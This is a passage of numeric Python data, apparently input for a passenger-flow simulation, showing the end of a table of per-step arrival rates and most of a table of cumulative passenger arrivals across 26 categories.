(8.482644675918554, 6.52296683124118, 9.247559857439049, 10.457641983711365, 10.526862339428039, 5.9763286306765995, 5.327842757991326, 6.427630228235103, 11.578900075025999, 5.5372019120514215, 6.550532940009634, 7.863975851455517, 9.362251533010546), # 168
(8.206468765048422, 6.302624641718972, 8.959538677474432, 10.126149070857236, 10.197647156150468, 5.793533271232973, 5.151491928338689, 6.231916969393004, 11.228778436831673, 5.358470266376831, 6.3403275896835956, 7.613741148001342, 9.0687723455431), # 169
(7.9202559061141375, 6.0754986331393726, 8.659048073472489, 9.781232183699368, 9.854395789607928, 5.60228847452065, 4.9691807994297745, 6.027012964039266, 10.861815596899735, 5.173008282864322, 6.122006748480023, 7.353528303935743, 8.762894995101878), # 170
(7.6251052732799005, 5.842391734180682, 8.34735588452217, 9.424293936379751, 9.498544015002288, 5.403431190123678, 4.781583849383328, 5.813823466834017, 10.47965484356274, 4.981541586536184, 5.896435872723688, 7.0843867999973416, 8.445892500963913), # 171
(7.322116040709912, 5.604106873521197, 8.025729949712423, 9.056736943040356, 9.131527607535416, 5.197798367626108, 4.5893755563180925, 5.593253732437379, 10.083939465153241, 4.784795802414712, 5.664480418739371, 6.80736611692476, 8.119037882406225), # 172
(7.012387382568372, 5.3614469798392195, 7.695438108132197, 8.679963817823166, 8.754782342409182, 4.9862269566119855, 4.39323039835281, 5.366209015509473, 9.676312750003792, 4.583496555522195, 5.427005842851849, 6.523515735456615, 7.783604158705848), # 173
(6.697018473019482, 5.115214981813045, 7.357748198870443, 8.295377174870158, 8.369743994825454, 4.76955390666536, 4.193822853606226, 5.133594570710425, 9.25841798644695, 4.3783694708809255, 5.1848776013858995, 6.233885136331535, 7.440864349139807), # 174
(6.377108486227438, 4.866213808120973, 7.013928061016112, 7.904379628323315, 7.977848339986097, 4.54861616737028, 3.9918274001970815, 4.896315652700355, 8.831898462815268, 4.170140173513194, 4.938961150666297, 5.939523800288141, 7.092091472985131), # 175
(6.053756596356447, 4.615246387441302, 6.66524553365815, 7.508373792324615, 7.580531153092983, 4.324250688310793, 3.787918516244121, 4.655277516139389, 8.3983974674413, 3.959534288441294, 4.690121947017822, 5.641481208065051, 6.738558549518844), # 176
(5.7280619775707065, 4.363115648452332, 6.3129684558855095, 7.108762281016037, 7.179228209347984, 4.097294419070949, 3.582770679866088, 4.411385415687646, 7.959558288657599, 3.7472774406875144, 4.43922544676525, 5.340806840400891, 6.381538598017975), # 177
(5.401123804034416, 4.11062451983236, 5.95836466678714, 6.7069477085395635, 6.775375283952959, 3.8685843092347962, 3.3770583691817246, 4.165544606005252, 7.51702421479672, 3.5340952552741505, 4.187137106233358, 5.038550178034279, 6.022304637759553), # 178
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 179
)
passenger_arriving_acc = (
(5, 5, 3, 0, 3, 4, 0, 2, 6, 1, 1, 1, 0, 4, 13, 6, 6, 10, 5, 4, 1, 1, 2, 0, 1, 0), # 0
(15, 15, 17, 5, 8, 7, 2, 6, 13, 3, 2, 2, 0, 13, 19, 11, 12, 17, 11, 5, 3, 3, 3, 0, 1, 0), # 1
(22, 22, 22, 15, 16, 10, 7, 6, 16, 3, 2, 3, 0, 20, 28, 17, 18, 24, 11, 8, 5, 5, 5, 0, 1, 0), # 2
(29, 27, 29, 22, 18, 18, 9, 7, 18, 4, 2, 4, 0, 29, 38, 23, 26, 30, 14, 10, 6, 6, 10, 0, 3, 0), # 3
(42, 31, 34, 35, 24, 24, 12, 12, 21, 6, 3, 5, 0, 39, 45, 30, 31, 38, 17, 12, 9, 12, 11, 0, 5, 0), # 4
(47, 37, 37, 45, 28, 27, 15, 14, 26, 10, 5, 6, 0, 48, 54, 39, 36, 47, 28, 16, 13, 15, 16, 0, 8, 0), # 5
(54, 49, 46, 55, 39, 29, 18, 20, 33, 10, 8, 6, 0, 60, 62, 49, 42, 54, 33, 21, 16, 20, 21, 1, 9, 0), # 6
(66, 59, 54, 65, 42, 35, 24, 23, 38, 11, 9, 8, 0, 73, 68, 56, 48, 66, 34, 23, 18, 26, 25, 3, 9, 0), # 7
(79, 68, 63, 77, 46, 37, 27, 23, 42, 11, 11, 9, 0, 82, 78, 68, 50, 79, 38, 27, 19, 29, 28, 4, 12, 0), # 8
(88, 79, 70, 87, 50, 40, 33, 29, 48, 14, 12, 9, 0, 93, 83, 79, 60, 87, 44, 33, 27, 36, 31, 5, 12, 0), # 9
(102, 87, 83, 96, 56, 44, 35, 35, 55, 15, 14, 10, 0, 107, 90, 85, 72, 93, 50, 35, 31, 40, 33, 6, 12, 0), # 10
(111, 94, 89, 107, 68, 46, 42, 37, 56, 16, 15, 11, 0, 116, 102, 93, 79, 103, 57, 41, 35, 49, 33, 6, 14, 0), # 11
(125, 104, 102, 121, 81, 52, 47, 46, 63, 16, 18, 12, 0, 128, 105, 100, 86, 120, 66, 43, 35, 52, 37, 8, 14, 0), # 12
(132, 116, 109, 129, 90, 56, 51, 51, 67, 19, 19, 14, 0, 138, 116, 108, 93, 132, 74, 49, 42, 55, 42, 9, 15, 0), # 13
(148, 127, 119, 141, 100, 62, 57, 53, 75, 20, 20, 15, 0, 157, 128, 116, 101, 140, 81, 55, 46, 59, 50, 11, 16, 0), # 14
(166, 144, 129, 152, 110, 66, 67, 56, 79, 23, 23, 16, 0, 166, 141, 126, 111, 146, 86, 62, 53, 60, 54, 15, 18, 0), # 15
(184, 159, 147, 166, 113, 70, 71, 64, 81, 27, 23, 17, 0, 182, 149, 137, 118, 155, 93, 72, 55, 64, 57, 20, 19, 0), # 16
(192, 173, 161, 177, 123, 72, 77, 67, 85, 27, 25, 18, 0, 192, 162, 149, 129, 168, 100, 80, 60, 69, 63, 22, 19, 0), # 17
(210, 184, 173, 190, 137, 76, 82, 71, 89, 28, 27, 18, 0, 204, 179, 160, 137, 177, 103, 86, 66, 72, 67, 24, 20, 0), # 18
(218, 197, 186, 199, 148, 82, 85, 80, 95, 30, 27, 20, 0, 219, 192, 164, 144, 185, 110, 88, 70, 75, 72, 27, 20, 0), # 19
(232, 220, 197, 211, 159, 84, 88, 83, 101, 37, 29, 22, 0, 229, 208, 180, 151, 199, 120, 93, 74, 79, 75, 29, 23, 0), # 20
(244, 236, 211, 223, 177, 90, 91, 89, 108, 41, 31, 22, 0, 241, 220, 184, 164, 207, 126, 100, 76, 84, 78, 29, 25, 0), # 21
(261, 249, 218, 235, 186, 95, 96, 89, 111, 44, 33, 23, 0, 258, 232, 197, 172, 220, 134, 108, 81, 89, 82, 32, 27, 0), # 22
(280, 263, 233, 249, 199, 100, 100, 97, 117, 45, 34, 28, 0, 275, 247, 205, 185, 231, 139, 116, 84, 95, 88, 33, 29, 0), # 23
(287, 278, 244, 264, 212, 101, 109, 104, 121, 50, 39, 29, 0, 292, 259, 216, 194, 242, 146, 119, 87, 101, 92, 33, 32, 0), # 24
(304, 291, 256, 278, 226, 106, 115, 108, 126, 53, 40, 30, 0, 313, 271, 227, 202, 248, 153, 126, 92, 106, 97, 38, 32, 0), # 25
(316, 310, 268, 296, 237, 109, 120, 117, 129, 55, 43, 31, 0, 334, 287, 240, 204, 259, 159, 134, 95, 109, 102, 41, 33, 0), # 26
(328, 322, 280, 308, 246, 115, 125, 125, 135, 57, 48, 31, 0, 355, 307, 252, 208, 271, 169, 141, 100, 114, 109, 44, 34, 0), # 27
(346, 335, 292, 319, 256, 125, 128, 131, 142, 59, 49, 34, 0, 374, 321, 268, 214, 286, 175, 147, 105, 119, 110, 49, 35, 0), # 28
(362, 347, 308, 335, 266, 126, 132, 133, 154, 62, 50, 35, 0, 386, 336, 279, 223, 299, 183, 153, 107, 125, 114, 51, 37, 0), # 29
(377, 364, 322, 347, 280, 133, 140, 142, 161, 64, 53, 35, 0, 400, 351, 292, 230, 311, 186, 153, 109, 128, 117, 53, 37, 0), # 30
(389, 374, 331, 351, 287, 136, 148, 148, 167, 68, 53, 36, 0, 413, 366, 299, 243, 324, 193, 158, 115, 134, 119, 56, 37, 0), # 31
(404, 384, 343, 365, 300, 144, 155, 154, 175, 73, 55, 36, 0, 429, 378, 311, 254, 335, 202, 163, 119, 139, 120, 57, 40, 0), # 32
(420, 396, 357, 377, 310, 150, 160, 161, 178, 74, 59, 37, 0, 442, 391, 320, 261, 350, 208, 170, 123, 143, 124, 58, 41, 0), # 33
(433, 415, 369, 389, 324, 153, 167, 166, 182, 75, 60, 37, 0, 458, 403, 333, 267, 356, 213, 178, 125, 145, 128, 62, 43, 0), # 34
(452, 426, 381, 398, 333, 157, 169, 170, 187, 76, 63, 39, 0, 466, 422, 340, 276, 370, 220, 184, 126, 153, 130, 65, 44, 0), # 35
(462, 440, 394, 412, 339, 163, 176, 176, 193, 78, 64, 40, 0, 476, 434, 346, 288, 380, 226, 187, 127, 155, 132, 67, 44, 0), # 36
(476, 458, 401, 427, 348, 168, 182, 182, 199, 80, 65, 42, 0, 486, 444, 355, 300, 388, 234, 191, 129, 162, 140, 70, 45, 0), # 37
(494, 472, 414, 450, 356, 171, 183, 188, 208, 81, 68, 44, 0, 499, 459, 371, 308, 403, 241, 197, 136, 171, 146, 75, 46, 0), # 38
(507, 492, 426, 466, 370, 177, 189, 190, 213, 84, 69, 44, 0, 510, 474, 381, 313, 413, 248, 200, 140, 173, 149, 76, 46, 0), # 39
(522, 503, 445, 484, 379, 185, 195, 195, 218, 89, 70, 46, 0, 520, 486, 389, 318, 420, 253, 207, 146, 184, 154, 78, 49, 0), # 40
(541, 513, 456, 499, 390, 193, 202, 199, 222, 94, 71, 48, 0, 531, 490, 395, 326, 433, 258, 212, 150, 191, 159, 82, 52, 0), # 41
(553, 528, 467, 515, 397, 201, 207, 203, 228, 97, 72, 50, 0, 548, 497, 404, 341, 446, 266, 221, 153, 198, 162, 82, 53, 0), # 42
(569, 535, 480, 529, 408, 206, 217, 208, 234, 97, 75, 52, 0, 563, 515, 409, 353, 459, 277, 231, 155, 208, 165, 85, 55, 0), # 43
(579, 544, 492, 536, 417, 215, 226, 215, 240, 101, 76, 53, 0, 574, 538, 421, 360, 471, 284, 237, 158, 218, 172, 87, 56, 0), # 44
(596, 560, 518, 543, 427, 217, 230, 220, 242, 102, 78, 54, 0, 587, 547, 427, 368, 481, 289, 241, 161, 222, 175, 89, 57, 0), # 45
(608, 574, 538, 555, 438, 222, 232, 226, 251, 107, 80, 54, 0, 604, 563, 440, 375, 498, 298, 243, 164, 227, 179, 89, 61, 0), # 46
(624, 594, 549, 571, 446, 229, 234, 234, 257, 110, 80, 55, 0, 618, 576, 452, 382, 510, 304, 249, 167, 228, 185, 93, 62, 0), # 47
(634, 607, 561, 589, 458, 236, 243, 240, 261, 113, 82, 56, 0, 642, 586, 458, 392, 520, 311, 252, 176, 233, 189, 94, 67, 0), # 48
(647, 617, 571, 602, 471, 243, 251, 245, 268, 115, 84, 56, 0, 659, 592, 467, 400, 531, 318, 261, 180, 241, 194, 96, 68, 0), # 49
(668, 626, 580, 616, 488, 246, 254, 249, 270, 117, 85, 58, 0, 678, 607, 479, 408, 540, 325, 264, 184, 246, 199, 97, 70, 0), # 50
(682, 640, 590, 633, 499, 251, 257, 257, 272, 121, 86, 58, 0, 688, 624, 492, 414, 551, 332, 270, 184, 251, 201, 98, 72, 0), # 51
(701, 656, 604, 642, 505, 258, 263, 259, 283, 123, 87, 59, 0, 697, 642, 506, 425, 556, 340, 275, 189, 259, 206, 98, 73, 0), # 52
(716, 671, 614, 655, 519, 261, 266, 263, 287, 124, 89, 59, 0, 709, 669, 518, 434, 568, 342, 277, 192, 263, 212, 103, 73, 0), # 53
(736, 685, 625, 662, 527, 266, 271, 266, 291, 129, 89, 60, 0, 717, 680, 526, 442, 577, 350, 281, 196, 266, 213, 104, 73, 0), # 54
(751, 697, 636, 671, 538, 272, 275, 274, 295, 132, 89, 60, 0, 735, 687, 537, 450, 590, 353, 286, 204, 272, 220, 106, 73, 0), # 55
(763, 713, 645, 680, 547, 277, 282, 278, 300, 133, 93, 62, 0, 752, 698, 548, 455, 602, 359, 288, 205, 279, 224, 108, 75, 0), # 56
(776, 729, 657, 687, 556, 286, 287, 279, 305, 137, 94, 63, 0, 766, 716, 559, 463, 614, 364, 296, 209, 281, 229, 112, 78, 0), # 57
(792, 745, 665, 706, 564, 287, 296, 281, 308, 141, 95, 67, 0, 776, 728, 565, 467, 633, 373, 305, 217, 285, 232, 114, 79, 0), # 58
(808, 756, 678, 718, 572, 292, 301, 287, 313, 142, 95, 68, 0, 790, 741, 580, 474, 647, 378, 311, 221, 287, 236, 116, 81, 0), # 59
(820, 770, 686, 732, 580, 301, 305, 292, 322, 142, 98, 69, 0, 815, 750, 591, 481, 655, 383, 317, 222, 292, 239, 117, 82, 0), # 60
(837, 785, 696, 741, 590, 307, 309, 295, 328, 146, 100, 71, 0, 823, 762, 598, 485, 665, 390, 321, 224, 296, 242, 121, 85, 0), # 61
(851, 798, 703, 755, 594, 310, 314, 300, 333, 149, 101, 72, 0, 841, 771, 608, 494, 675, 396, 327, 226, 299, 246, 125, 85, 0), # 62
(861, 816, 709, 765, 601, 313, 321, 303, 338, 153, 103, 73, 0, 847, 787, 615, 500, 686, 399, 333, 227, 304, 253, 128, 86, 0), # 63
(877, 831, 720, 780, 614, 317, 324, 306, 346, 156, 105, 74, 0, 862, 799, 623, 504, 695, 406, 342, 231, 311, 256, 128, 87, 0), # 64
(891, 847, 731, 789, 627, 321, 328, 313, 350, 162, 106, 75, 0, 873, 813, 631, 509, 710, 411, 345, 237, 316, 264, 133, 88, 0), # 65
(903, 858, 744, 804, 634, 325, 335, 313, 356, 167, 108, 75, 0, 884, 837, 644, 511, 718, 415, 351, 242, 319, 272, 135, 88, 0), # 66
(918, 873, 757, 817, 650, 330, 337, 320, 357, 171, 113, 77, 0, 894, 850, 660, 520, 731, 421, 355, 250, 324, 278, 140, 89, 0), # 67
(932, 882, 772, 826, 665, 338, 342, 326, 359, 171, 117, 78, 0, 900, 860, 668, 526, 739, 429, 361, 253, 328, 284, 141, 90, 0), # 68
(947, 893, 783, 842, 675, 341, 348, 329, 364, 176, 119, 78, 0, 916, 872, 677, 533, 756, 436, 364, 257, 330, 291, 141, 90, 0), # 69
(957, 903, 797, 855, 688, 345, 357, 335, 369, 178, 124, 79, 0, 933, 887, 683, 546, 764, 446, 368, 259, 335, 296, 142, 90, 0), # 70
(970, 915, 807, 877, 705, 353, 362, 338, 374, 181, 126, 83, 0, 947, 899, 693, 551, 776, 451, 377, 263, 339, 300, 146, 93, 0), # 71
(986, 926, 817, 890, 719, 359, 366, 345, 382, 183, 126, 83, 0, 960, 913, 708, 559, 789, 459, 380, 265, 345, 304, 149, 95, 0), # 72
(1000, 940, 826, 901, 730, 362, 368, 351, 386, 186, 127, 83, 0, 976, 928, 716, 569, 800, 466, 385, 266, 355, 306, 151, 96, 0), # 73
(1016, 948, 834, 907, 735, 370, 374, 354, 390, 187, 130, 85, 0, 993, 942, 720, 577, 812, 475, 390, 271, 361, 309, 152, 99, 0), # 74
(1029, 971, 842, 921, 744, 375, 377, 357, 400, 189, 132, 86, 0, 1014, 953, 730, 594, 820, 483, 397, 275, 369, 312, 157, 100, 0), # 75
(1043, 987, 849, 932, 759, 384, 381, 362, 406, 192, 133, 87, 0, 1024, 964, 739, 597, 830, 485, 402, 284, 374, 316, 160, 101, 0), # 76
(1053, 1003, 858, 949, 774, 388, 386, 371, 416, 195, 134, 89, 0, 1039, 980, 749, 605, 840, 491, 408, 288, 375, 321, 162, 102, 0), # 77
(1066, 1011, 871, 969, 781, 395, 395, 372, 421, 197, 138, 89, 0, 1049, 994, 754, 613, 848, 494, 412, 291, 377, 326, 164, 103, 0), # 78
(1085, 1022, 884, 980, 790, 398, 405, 374, 425, 199, 140, 92, 0, 1073, 1010, 766, 620, 859, 506, 417, 294, 383, 332, 166, 105, 0), # 79
(1103, 1039, 894, 986, 797, 402, 409, 382, 429, 200, 142, 93, 0, 1087, 1022, 778, 628, 869, 510, 423, 301, 389, 337, 170, 106, 0), # 80
(1113, 1052, 904, 994, 804, 406, 414, 385, 432, 204, 142, 93, 0, 1099, 1028, 787, 638, 885, 516, 429, 307, 397, 345, 174, 106, 0), # 81
(1129, 1067, 910, 1004, 811, 407, 420, 389, 440, 206, 142, 93, 0, 1117, 1040, 791, 642, 896, 518, 436, 310, 403, 351, 178, 106, 0), # 82
(1139, 1077, 922, 1008, 821, 410, 424, 394, 448, 209, 142, 95, 0, 1129, 1053, 800, 647, 916, 520, 440, 314, 407, 358, 179, 107, 0), # 83
(1151, 1093, 935, 1017, 834, 414, 429, 398, 450, 211, 143, 95, 0, 1144, 1066, 815, 653, 926, 526, 447, 316, 412, 362, 182, 110, 0), # 84
(1161, 1102, 950, 1034, 843, 417, 435, 403, 455, 212, 144, 95, 0, 1157, 1077, 828, 658, 939, 537, 454, 323, 414, 363, 183, 111, 0), # 85
(1179, 1113, 959, 1045, 848, 423, 441, 405, 460, 215, 147, 96, 0, 1169, 1092, 836, 661, 949, 542, 457, 329, 419, 366, 184, 111, 0), # 86
(1190, 1119, 973, 1056, 862, 428, 445, 412, 465, 217, 151, 97, 0, 1188, 1107, 843, 666, 960, 548, 461, 329, 428, 370, 186, 113, 0), # 87
(1202, 1125, 985, 1065, 876, 432, 452, 418, 469, 220, 154, 97, 0, 1200, 1121, 847, 677, 973, 556, 464, 336, 435, 372, 188, 113, 0), # 88
(1220, 1135, 998, 1078, 888, 441, 458, 421, 479, 225, 155, 97, 0, 1217, 1129, 855, 686, 987, 558, 468, 338, 443, 374, 193, 114, 0), # 89
(1235, 1142, 1009, 1085, 903, 446, 465, 426, 485, 228, 157, 97, 0, 1227, 1144, 864, 697, 999, 561, 473, 343, 449, 374, 193, 117, 0), # 90
(1247, 1153, 1023, 1096, 918, 449, 472, 433, 489, 230, 158, 98, 0, 1240, 1153, 876, 700, 1003, 569, 479, 347, 452, 383, 197, 117, 0), # 91
(1266, 1165, 1035, 1110, 926, 456, 475, 437, 490, 231, 163, 99, 0, 1259, 1163, 884, 704, 1010, 575, 484, 351, 456, 384, 199, 117, 0), # 92
(1280, 1171, 1050, 1127, 934, 467, 478, 445, 498, 232, 164, 100, 0, 1266, 1179, 897, 711, 1018, 581, 485, 358, 460, 385, 201, 119, 0), # 93
(1295, 1185, 1063, 1144, 940, 469, 481, 449, 507, 234, 166, 103, 0, 1277, 1194, 906, 713, 1037, 584, 490, 361, 465, 389, 202, 119, 0), # 94
(1315, 1199, 1072, 1157, 950, 471, 489, 452, 511, 234, 168, 104, 0, 1294, 1204, 921, 716, 1044, 592, 491, 365, 476, 393, 202, 121, 0), # 95
(1328, 1209, 1088, 1167, 962, 475, 494, 453, 513, 236, 171, 105, 0, 1306, 1216, 931, 720, 1053, 598, 493, 365, 482, 395, 202, 121, 0), # 96
(1340, 1219, 1100, 1179, 972, 479, 497, 455, 516, 239, 173, 105, 0, 1315, 1225, 941, 730, 1063, 602, 502, 369, 490, 399, 206, 123, 0), # 97
(1353, 1231, 1107, 1191, 982, 480, 500, 459, 526, 239, 173, 108, 0, 1326, 1237, 953, 732, 1077, 609, 504, 369, 494, 406, 210, 126, 0), # 98
(1370, 1242, 1119, 1202, 991, 485, 503, 463, 528, 240, 174, 110, 0, 1340, 1247, 964, 737, 1089, 614, 506, 374, 497, 410, 212, 128, 0), # 99
(1385, 1260, 1134, 1218, 1000, 487, 507, 471, 534, 244, 179, 111, 0, 1357, 1258, 973, 743, 1094, 618, 512, 381, 500, 412, 216, 129, 0), # 100
(1395, 1273, 1150, 1232, 1009, 493, 515, 473, 543, 247, 179, 111, 0, 1374, 1270, 979, 746, 1109, 623, 518, 383, 504, 422, 218, 131, 0), # 101
(1409, 1285, 1159, 1242, 1021, 499, 522, 476, 547, 249, 181, 111, 0, 1387, 1280, 981, 752, 1117, 628, 523, 386, 507, 422, 219, 132, 0), # 102
(1425, 1292, 1165, 1253, 1033, 509, 529, 481, 555, 255, 181, 111, 0, 1403, 1289, 988, 757, 1123, 635, 526, 388, 511, 431, 220, 133, 0), # 103
(1440, 1300, 1178, 1264, 1047, 511, 532, 486, 561, 258, 185, 115, 0, 1411, 1305, 994, 766, 1132, 641, 529, 390, 522, 435, 224, 134, 0), # 104
(1452, 1315, 1185, 1277, 1057, 515, 539, 486, 568, 260, 187, 115, 0, 1425, 1312, 1002, 772, 1144, 649, 534, 393, 530, 440, 227, 136, 0), # 105
(1466, 1323, 1195, 1286, 1065, 518, 543, 492, 573, 264, 192, 117, 0, 1445, 1320, 1016, 777, 1155, 656, 538, 401, 542, 444, 229, 136, 0), # 106
(1481, 1332, 1212, 1304, 1075, 521, 550, 496, 579, 266, 197, 119, 0, 1456, 1333, 1024, 782, 1169, 662, 541, 405, 549, 450, 230, 136, 0), # 107
(1492, 1342, 1218, 1316, 1087, 526, 551, 499, 585, 266, 202, 122, 0, 1477, 1340, 1031, 794, 1179, 665, 547, 408, 561, 453, 230, 137, 0), # 108
(1505, 1350, 1226, 1322, 1099, 531, 554, 504, 590, 266, 202, 122, 0, 1494, 1350, 1042, 799, 1189, 668, 551, 412, 564, 457, 232, 137, 0), # 109
(1524, 1361, 1234, 1342, 1109, 538, 558, 508, 595, 270, 203, 122, 0, 1507, 1359, 1047, 801, 1199, 672, 558, 416, 570, 458, 234, 138, 0), # 110
(1531, 1375, 1245, 1354, 1120, 541, 565, 512, 602, 271, 204, 124, 0, 1515, 1366, 1054, 809, 1209, 674, 563, 418, 576, 461, 235, 140, 0), # 111
(1553, 1389, 1252, 1362, 1130, 545, 569, 513, 609, 274, 204, 127, 0, 1530, 1381, 1061, 814, 1221, 679, 568, 426, 579, 463, 238, 140, 0), # 112
(1557, 1398, 1268, 1371, 1144, 547, 571, 517, 614, 277, 206, 127, 0, 1548, 1385, 1068, 819, 1237, 684, 574, 433, 587, 466, 241, 142, 0), # 113
(1575, 1404, 1281, 1378, 1149, 552, 576, 521, 620, 278, 207, 127, 0, 1557, 1394, 1078, 829, 1251, 688, 579, 433, 589, 470, 242, 144, 0), # 114
(1595, 1413, 1290, 1393, 1161, 558, 578, 521, 623, 283, 209, 127, 0, 1573, 1408, 1083, 836, 1259, 693, 587, 435, 592, 471, 245, 145, 0), # 115
(1609, 1423, 1309, 1398, 1173, 566, 582, 527, 626, 286, 210, 129, 0, 1583, 1413, 1092, 842, 1265, 696, 592, 437, 597, 477, 247, 145, 0), # 116
(1618, 1438, 1324, 1410, 1183, 576, 584, 534, 634, 287, 211, 130, 0, 1602, 1422, 1103, 853, 1275, 703, 593, 438, 601, 484, 249, 146, 0), # 117
(1633, 1452, 1335, 1419, 1194, 577, 587, 538, 645, 289, 212, 132, 0, 1610, 1432, 1111, 859, 1290, 706, 597, 441, 610, 485, 250, 147, 0), # 118
(1647, 1464, 1346, 1430, 1206, 584, 591, 543, 646, 292, 213, 134, 0, 1628, 1439, 1122, 869, 1300, 716, 600, 444, 614, 490, 252, 147, 0), # 119
(1659, 1476, 1357, 1445, 1218, 586, 596, 545, 652, 292, 216, 136, 0, 1641, 1447, 1129, 875, 1311, 722, 602, 451, 618, 492, 254, 147, 0), # 120
(1673, 1486, 1374, 1458, 1225, 589, 600, 550, 654, 296, 216, 138, 0, 1656, 1457, 1137, 881, 1318, 728, 609, 453, 619, 494, 256, 147, 0), # 121
(1691, 1496, 1384, 1473, 1232, 595, 608, 552, 659, 299, 220, 140, 0, 1668, 1470, 1143, 886, 1327, 736, 614, 459, 627, 497, 259, 147, 0), # 122
(1704, 1506, 1401, 1481, 1238, 600, 611, 558, 664, 299, 225, 140, 0, 1682, 1480, 1150, 892, 1338, 736, 616, 461, 631, 501, 260, 148, 0), # 123
(1716, 1518, 1409, 1495, 1247, 606, 615, 560, 665, 299, 227, 140, 0, 1694, 1490, 1157, 900, 1346, 739, 623, 465, 639, 506, 261, 148, 0), # 124
(1727, 1523, 1416, 1513, 1260, 609, 622, 562, 667, 300, 227, 140, 0, 1705, 1499, 1166, 904, 1350, 745, 629, 469, 643, 508, 263, 149, 0), # 125
(1741, 1530, 1425, 1530, 1269, 615, 624, 563, 671, 300, 227, 142, 0, 1722, 1508, 1172, 908, 1364, 750, 633, 470, 644, 512, 265, 149, 0), # 126
(1751, 1539, 1432, 1537, 1278, 615, 628, 566, 677, 301, 228, 142, 0, 1737, 1520, 1182, 911, 1369, 752, 641, 472, 651, 514, 268, 149, 0), # 127
(1761, 1552, 1444, 1548, 1286, 623, 632, 568, 683, 302, 229, 143, 0, 1747, 1530, 1190, 915, 1377, 755, 643, 476, 656, 517, 270, 151, 0), # 128
(1767, 1561, 1464, 1562, 1298, 626, 637, 574, 686, 302, 230, 145, 0, 1762, 1538, 1197, 920, 1382, 758, 649, 483, 659, 521, 272, 151, 0), # 129
(1782, 1566, 1474, 1572, 1307, 628, 643, 576, 691, 307, 230, 146, 0, 1774, 1547, 1206, 926, 1389, 762, 650, 488, 661, 525, 273, 152, 0), # 130
(1793, 1570, 1485, 1578, 1315, 632, 648, 577, 692, 309, 231, 148, 0, 1785, 1555, 1211, 929, 1394, 770, 657, 490, 668, 529, 275, 153, 0), # 131
(1798, 1579, 1494, 1582, 1325, 637, 651, 580, 698, 309, 234, 151, 0, 1796, 1567, 1216, 937, 1399, 779, 663, 493, 676, 533, 276, 154, 0), # 132
(1809, 1597, 1504, 1594, 1333, 641, 653, 585, 701, 312, 237, 151, 0, 1806, 1578, 1225, 943, 1407, 785, 666, 499, 680, 536, 277, 155, 0), # 133
(1822, 1607, 1514, 1600, 1342, 649, 657, 590, 705, 312, 240, 152, 0, 1822, 1588, 1231, 949, 1424, 787, 671, 503, 688, 543, 279, 155, 0), # 134
(1837, 1619, 1526, 1609, 1352, 653, 663, 592, 707, 312, 243, 152, 0, 1834, 1595, 1241, 953, 1433, 795, 676, 505, 692, 547, 287, 157, 0), # 135
(1848, 1631, 1534, 1625, 1360, 655, 666, 598, 712, 314, 244, 153, 0, 1845, 1604, 1248, 960, 1437, 802, 678, 511, 701, 551, 288, 157, 0), # 136
(1860, 1634, 1548, 1632, 1370, 660, 670, 601, 717, 315, 246, 155, 0, 1858, 1608, 1252, 966, 1443, 806, 683, 512, 708, 556, 290, 157, 0), # 137
(1874, 1646, 1558, 1646, 1383, 663, 676, 605, 721, 321, 248, 155, 0, 1869, 1616, 1261, 974, 1452, 809, 685, 516, 712, 559, 291, 157, 0), # 138
(1884, 1656, 1567, 1662, 1399, 667, 677, 610, 726, 321, 249, 155, 0, 1881, 1628, 1268, 977, 1460, 817, 689, 517, 717, 561, 294, 158, 0), # 139
(1896, 1666, 1583, 1671, 1406, 668, 681, 612, 731, 323, 251, 158, 0, 1888, 1640, 1276, 981, 1471, 824, 695, 522, 720, 567, 296, 158, 0), # 140
(1909, 1674, 1589, 1676, 1413, 675, 686, 618, 734, 323, 255, 158, 0, 1901, 1648, 1280, 983, 1477, 830, 699, 526, 721, 569, 297, 159, 0), # 141
(1922, 1685, 1601, 1690, 1424, 680, 688, 621, 737, 323, 257, 160, 0, 1913, 1658, 1283, 990, 1486, 836, 707, 528, 726, 575, 301, 160, 0), # 142
(1939, 1689, 1615, 1698, 1434, 686, 689, 626, 743, 324, 257, 162, 0, 1931, 1667, 1291, 996, 1498, 840, 712, 529, 732, 579, 305, 161, 0), # 143
(1951, 1702, 1626, 1708, 1439, 688, 693, 627, 750, 328, 259, 162, 0, 1940, 1675, 1297, 1002, 1506, 845, 715, 531, 735, 580, 307, 163, 0), # 144
(1957, 1716, 1635, 1716, 1447, 692, 696, 630, 753, 329, 263, 162, 0, 1959, 1686, 1306, 1005, 1520, 850, 720, 535, 737, 582, 311, 165, 0), # 145
(1970, 1724, 1650, 1727, 1454, 695, 696, 632, 762, 330, 264, 163, 0, 1974, 1697, 1317, 1012, 1533, 862, 722, 536, 739, 582, 314, 165, 0), # 146
(1981, 1734, 1661, 1738, 1464, 700, 699, 634, 763, 333, 264, 164, 0, 1987, 1708, 1326, 1018, 1542, 868, 726, 539, 741, 583, 314, 165, 0), # 147
(1993, 1737, 1670, 1748, 1485, 707, 701, 640, 768, 333, 266, 165, 0, 1996, 1717, 1329, 1026, 1553, 871, 729, 543, 746, 587, 314, 165, 0), # 148
(2005, 1744, 1670, 1760, 1495, 716, 705, 641, 772, 334, 267, 167, 0, 2008, 1730, 1339, 1030, 1560, 873, 732, 545, 754, 591, 317, 165, 0), # 149
(2012, 1753, 1679, 1768, 1508, 719, 709, 644, 774, 335, 271, 167, 0, 2021, 1739, 1349, 1034, 1569, 875, 734, 550, 759, 593, 322, 167, 0), # 150
(2021, 1767, 1688, 1778, 1520, 721, 711, 647, 780, 337, 272, 168, 0, 2032, 1749, 1358, 1041, 1577, 880, 736, 553, 759, 600, 323, 167, 0), # 151
(2032, 1780, 1700, 1784, 1528, 725, 717, 654, 786, 339, 273, 168, 0, 2042, 1760, 1366, 1049, 1582, 887, 740, 558, 764, 601, 324, 169, 0), # 152
(2048, 1784, 1706, 1797, 1538, 732, 719, 657, 792, 343, 274, 168, 0, 2052, 1771, 1371, 1054, 1590, 890, 746, 562, 769, 604, 326, 169, 0), # 153
(2062, 1792, 1715, 1805, 1547, 734, 721, 660, 796, 345, 277, 168, 0, 2066, 1782, 1375, 1060, 1599, 895, 751, 566, 771, 606, 326, 169, 0), # 154
(2065, 1797, 1722, 1809, 1551, 740, 725, 668, 804, 345, 277, 169, 0, 2079, 1787, 1379, 1068, 1606, 900, 756, 567, 774, 607, 327, 170, 0), # 155
(2071, 1806, 1738, 1823, 1560, 744, 729, 670, 808, 346, 277, 169, 0, 2090, 1795, 1382, 1071, 1612, 903, 763, 571, 778, 611, 331, 170, 0), # 156
